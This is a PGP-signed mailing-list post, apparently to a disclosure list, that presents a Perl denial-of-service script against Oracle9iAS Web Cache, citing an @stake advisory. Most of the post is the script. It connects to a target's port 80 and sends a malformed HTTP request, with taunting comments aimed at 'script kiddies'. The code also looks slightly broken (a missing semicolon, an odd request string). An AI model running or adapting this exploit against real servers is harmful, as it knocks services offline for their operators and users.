-----BEGIN PGP SIGNED MESSAGE-----

hiya ppl,

I have made a quick script to demonstrate the Oracle DOS described in @stakes advisory:

Oracle9iAS Web Cache Denial of Service

please find the perl script pasted below.

regards:
eip/deadbeat/AnGrY_SQl

p.s. I did have about 10submissions but due to hardware failure and no backup :( I lost most my work, I will go through my h.d with a fine comb see if i can rescue some of it..there's a hell of alot more submissions to come ;)

- -----------------oracle.pl----------------
#!/usr/bin/perl

# Oracle9iAS Web Cache Denial of Service
#Coded by eip/Deadbeat/AnGrY_SQl
#haf fun script_kiddiots..

use IO::Socket;

print "\n Oracle9iAS Web Cache Denial of Service\n";
if (!$ARGV[0]){
    die "Usage: perl $0 host \n";
}
$host = $ARGV[0];
print "Ok lets DOS: $host \n";
$exploit = "GET / HTTP/1.0 Host: no-one \x0a\x0d\x0a\x0d";
print $exploit
$sox = IO::Socket::INET->new(
    Proto=>"tcp",
    PeerPort=>"80",
    PeerAddr=>"$host",
);
print $sox, $exploit;
print "Done..muhahaha..\n\n";
- ------------------------------------EOF-----------------

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlkEARECABkFAj2+jVESHGRlYWRiZWF0QGh1c2guY29tAAoJEEUUsIhkeIbp5koAn0Gr
aqTkPyPohdu+fRPVjCHiMO4/AJsEvRc09905wdu6kiN7Z5X4/t/f4g==
=VaJ6
-----END PGP SIGNATURE-----